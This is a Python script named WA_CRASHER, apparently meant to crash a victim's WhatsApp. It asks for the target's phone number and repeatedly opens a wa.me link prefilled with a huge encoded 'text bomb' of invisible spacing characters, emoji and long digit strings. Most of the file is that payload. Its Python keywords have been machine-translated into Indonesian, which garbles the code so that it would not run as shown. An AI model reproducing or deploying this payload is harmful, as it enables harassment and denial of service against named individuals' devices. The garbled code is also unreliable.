# Hak Cipta (c) 2022 X PHANTOM (PH4N70M)

# Izin dengan ini diberikan, gratis, kepada siapa pun yang mendapatkan salinannya
#dari perangkat lunak ini dan file dokumentasi terkait ("Perangkat Lunak"), untuk menangani
#dalam Perangkat Lunak tanpa batasan, termasuk tanpa batasan hak
#untuk menggunakan, menyalin, memodifikasi, menggabungkan, menerbitkan, mendistribusikan, mensublisensikan, dan/atau menjual
#salinan Perangkat Lunak, dan untuk mengizinkan orang-orang yang memiliki Perangkat Lunak
#furnished untuk melakukannya, dengan ketentuan sebagai berikut:
#
#Pemberitahuan hak cipta di atas dan pemberitahuan izin ini harus disertakan dalam semua
#salinan atau sebagian besar Perangkat Lunak.
#
#PERANGKAT LUNAK DISEDIAKAN "SEBAGAIMANA ADANYA", TANPA JAMINAN APA PUN, TERSURAT ATAU
#TERSIRAT, TERMASUK NAMUN TIDAK TERBATAS PADA JAMINAN DIPERDAGANGKAN,
#FITNESS UNTUK TUJUAN TERTENTU DAN TANPA PELANGGARAN. DALAM HAL APAPUN
# PENULIS ATAU PEMEGANG HAK CIPTA BERTANGGUNG JAWAB ATAS KLAIM, KERUSAKAN ATAU LAINNYA
#TANGGUNG JAWAB, BAIK DALAM TINDAKAN KONTRAK, KERUGIAN ATAU LAINNYA, TIMBUL DARI,
#DILUAR ATAU BERHUBUNGAN DENGAN PERANGKAT LUNAK ATAU PENGGUNAAN ATAU HUBUNGAN LAINNYA DALAM
#PERANGKAT LUNAK.
##############################################
# X PHANTOM (PH4N70M) #
#Proyek : WA_CRASHER#
#Tipe : Whatsapp - Crasher#
##############################################
impor  os
impor  colorama
 waktu impor
 sistem impor
dari  colorama  import   Fore , Style
R  =  Kedepan . MERAH
B  =  Depan . BIRU
G  =  Depan . HIJAU
C  =  Kedepan . CYAN
Y  =  Kedepan . KUNING
M  =  Depan . MAGENTA
W  =  Depan . PUTIH
coba :
	impor  colorama
kecuali  ModuleNotFoundError :
	print ( "Permintaan tidak Diinstal" )
	os . sistem ( "pip install colorama" )

logo  =  f"""
{ C }                                                                                                      
    
__ __ _ ___ __ _ __ __ __  
/ / /\ \ \/_\ / __\ /__\ /_\ / _\ /\ /\/__\/__\
\ \/ \/ ​​//_ \\      / / / \// //_ \\ \ \ / /_/ /_\ / \//
\ /\ / _ \ / /___/ _ \/ _ \_\ \/ __ //__/ _ \
  \/ \/\_/ \_/___\____/\/ \_/\_/ \_/\__/\/ /_/\__/\/ \_/
             |_____|                                      
                                                   
{ W }
XPHANTOM PH4N70M													  
"""
os . sistem ( 'jelas' )

def  utama ():
	os . sistem ( 'jelas' )
	cetak ( logo )
	cetak ()
	cncode = int ( input ( f' { G } [ { Y } + { G } ] { M } Masukkan Kode Negara Tanpa "+" mis.91 { C } => ' ))
	cetak ()
	num = input ( f" { G } [ { Y } + { G } ] { M } Masukkan Nomor Telepon Korban \n \n { C } => { cncode }   " )
	cetak ()
	crash = int ( input ( f' { G } [ { Y } + { G } ] { M } Masukkan jumlah crash { W } (Maks. 15 per 30 menit) \n \n { C } => ' ))
	combnum  =  f"+ { cncode } { num } "
	cetak ()
	Panggilan akhir = input ( f' { G } [?] { W } Apakah Anda Ingin Mengubah NO. { W } { combnum }  { R } (Y/T) \n \n { C } => ' )
	jika  Finalcall  ==  'Y'   atau  Finalcall  ==  'y' :
		utama ()
	elif  Finalcall  ==  'N'  atau  Finalcall  ==  'n' :
		os . sistem ( 'jelas' )
		print ( f" { G } [ { Y } + { G } ] { M } Mengganggu Whatsapp di No. : + { cncode } { num } ..." )
		waktu . tidur ( 5 )
		link  = ( f"""xdg-buka https://wa.me/ { combnum }/?text=XPHANTOM%20%F0%9F%92%A3%20TeaM%20XPH4N70M%F0%9F%92%A3%20%E2%80%8A%20%E2%80%8A%20%E2%80% 8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A% 20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20% E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2% 80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80% 8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%20%E2%80% 8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A% 20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20% E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2% 80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80% 8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A% 20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2% 80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80% 8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A% 20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20% E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2% 80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80% 8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A%20%E2%80%8A% 20%E2%80%8A%0A%F0%9F%98%88Follow%20Me%20On%20Insta%20%40XPHANTOM_PH4N70M%F0%9F%A4%A3%0A%F0%9F%94%A5WA_CRASHER%201%20WA_CRASH% 20%F0%9F%98%88%0A*NULL%0A*999999999*%20*X*%20*9999999999*%0A%0A*8888888888*%20*XPHANTOM*%20*88888888888*%0A%0A* 9999999999*%20*XPHANTOM*%20*9999999999*%0A%0A*8888888888*%20*XPHANTOM*%20*888888888*%0A%0A*99999999999*%20*XPHANTOM*%20*9999999999*%0A%0A*8888888888*%20*XPHANTOM*%20*88888888888*%0A%0A*99999999999*%20*XPHANTOM*%20*999999999999*%0A%0A *8888888888*%20*XPHANTOM*%20*888888888*%0A*XPHANTOM%20CRATER%20MR%20PH4N70M%20X%C2%B2*%0A*99999999999*%20*XPHANTOM*%20*99999999999*%0A%0A* 8888888888*%20*XPHANTOM*%20*888888888*%0A%0A*999999999*%20*XPHANTOM*%20*9999999999*%0A%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A%0A *99999999999*%20*XPHANTOM*%20*9999999999*%0A%0A*88888888888*%20*XPHANTOM*%20*8888888888*%0A%0A*999999999999*%20*XPHANTOM*%20*99999999999*%0A% 0A*888888888888*%20*XPHANTOM*%20*88888888888*%0A%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A %0A*99999999999*%20*XPHANTOM*%20*9999999999*%0A%0A*888888888*%20*XPHANTOM*%20*8888888888*%0A%0A*999999999999*%20*XPHANTOM*%20*999999999999*% 0A%0A*8888888888*%20*XPHANTOM*%20*888888888*%0A%0A*99999999999*%20*XPHANTOM*%20*9999999999*%0A%0A*888888888*%20*XPHANTOM*%20*8888888888*%0A%0A*999999999999*%20*XPHANTOM*%20*999999999999*% 0A%0A*88888888888*%20*XPHANTOM*%20*8888888888*%0A%0A*999999999*%20*XPHANTOM*%20*99999999999*%0A%0A*88888888888*%20*XPHANTOM*%20*888888888* %0A%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A%0A*888888888*%20*XPHANTOM*%20*888888888*%0A%0A*999999999999*%20*XPHANTOM*%20*999999999999 *%0A%0A*8888888888*%20*XPHANTOM*%20*8888888888*%0A%F0%9F%93%8CBY%E2%80%A2MR%E2%80%A2KILLER-XPHANTOM%F0%9F%92%A3 %0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A*999999999*%20*XPHANTOM*%20*999999999*%0A*88888888888*%20*XPHANTOM*%20*888888888*%0A*999999999* %20*XPHANTOM*%20*9999999999*%0A*88888888888*%20*XPHANTOM*%20*8888888888*%0A*999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20*XPHANTOM* %20*88888888888*%0A*999999999*%20*XPHANTOM*%20*9999999999*%0A*88888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A* 9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20* XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*88888888888*%0A*99999999999*%20*XPHANTOM*%20* 9999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A* 9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20* XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*88888888888*%0A*99999999999*%20*XPHANTOM*%20* 9999999999*%0A*88888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A* 9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20* XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*88888888888*%0A*99999999999*%20*XPHANTOM*%20* 9999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A* 9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20* XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*88888888888*%0A*99999999999*%20*XPHANTOM*%20* 9999999999*%0A*88888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A* 9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20* XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*88888888888*%0A*99999999999*%20*XPHANTOM*%20* 9999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A* 9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20* XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*88888888888*%0A*99999999999*%20*XPHANTOM*%20* 9999999999*%0A*88888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A* 9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20* XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*88888888888*%0A*99999999999*%20*XPHANTOM*%20* 9999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A* 9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20* XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*88888888888*%0A*99999999999*%20*XPHANTOM*%20* 9999999999*%0A*88888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A* 9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20* XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*88888888888*%0A*99999999999*%20*XPHANTOM*%20* 9999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A* 9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20* XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*88888888888*%0A*99999999999*%20*XPHANTOM*%20* 9999999999*%0A*88888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A* 9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20* XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*88888888888*%0A*99999999999*%20*XPHANTOM*%20* 9999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A* 9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20* XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*88888888888*%0A*99999999999*%20*XPHANTOM*%20* 9999999999*%0A*88888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*9999999999*%0A*88888888888*%20*XPHANTOM*%20*88888888888*%0A* 9999999999*%20*XPHANTOM*%20*9999999999*%0A*888888888*%20*XPHANTOM*%20*8888888888*%0A*9999999999*%20*XPHANTOM*%20*99999999999*%0A*88888888888*%20* XPHANTOM*
""" )
	untuk  saya  dalam  jangkauan ( crash ):
		cetak ()
		print ( f" { Y } [✓] Mengirim Sekarang \n " )
		print ( f" { G } [ { Y } + { G } ] { M } Menerapkan penundaan 40 detik..." )
		tautan1  =  os . sistem ( tautan )
		waktu . tidur ( 40 )
		jika  tautan1  ==  0 :
			print ( f" { G } Berhasil" )
			lulus
		lain :
			print ( f" { R } [×] Gagal " )
		waktu . tidur ( 0.2 )
	kembali  utama ()

def  MSG ():
	cetak ( Y )
	YTC  =  input ( "Sudahkah Anda Bergabung dengan Kami? (Y/T): " )
	jika  YTC  ==  'Y'  atau  YTC  ==  'y' :
		cetak ( G )
		print ( "Terima Kasih Telah Bergabung Dengan Kami... \n " )
		waktu . tidur ( 4 )
		print ( "Alat inisialisasi..." )
		waktu . tidur ( 4 )		
		cetak ( W  +  " \n \n " )
		utama ()
	elif  YTC  ==  'N'  atau  YTC  ==  'n' :
		cetak ( "" )
		os . sistem ( "xdg-buka https://hackerxphantom.blogspot.com/p/join-whatsapp-group.html" )
		waktu . tidur ( 8 )
		os . sistem ( "xdg-buka https://hackerxphantom.blogspot.com/p/join-whatsapp-group.html" )
		waktu . tidur ( 3 )
		cetak ( W  +  " \n \n " )
		utama ()

MSG ()
